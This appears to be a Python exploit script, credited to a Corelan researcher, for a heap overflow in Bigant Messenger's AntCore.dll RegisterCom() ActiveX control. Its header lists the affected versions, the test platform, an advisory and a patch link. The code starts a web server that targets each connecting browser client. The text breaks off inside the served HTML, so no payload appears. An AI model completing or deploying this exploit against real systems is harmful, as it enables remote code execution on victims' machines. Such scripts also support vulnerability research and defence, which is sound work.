#!/usr/bin/python # ######################################################################################### # Bigant Messenger <= v2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow Exploit # Found by: Steven Seeley - mr_me( AT )corelan.be - http://net-ninja.net/ # Homepage: http://www.bigantsoft.com/ # Download: http://www.bigantsoft.com/download.html # Tested on: Windows XP SP3 (IE 6 & 7) # Marked safe for scripting: No # Advisory: http://www.corelan.be:8800/advisories.php?id=10-033 # Patch: http://www.bigantsoft.com/software/BigAnt255SP8.zip # Greetz: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # ######################################################################################## # Note: There are many other vulnerable controls in this dll such as ListBoard(). # ######################################################################################## # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # ######################################################################################## from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys class myRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.printCustomHTTPResponse(200) if self.path == "/": target=self.client_address[0] self.wfile.write("""
Bigant Messenger <= v2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow Exploit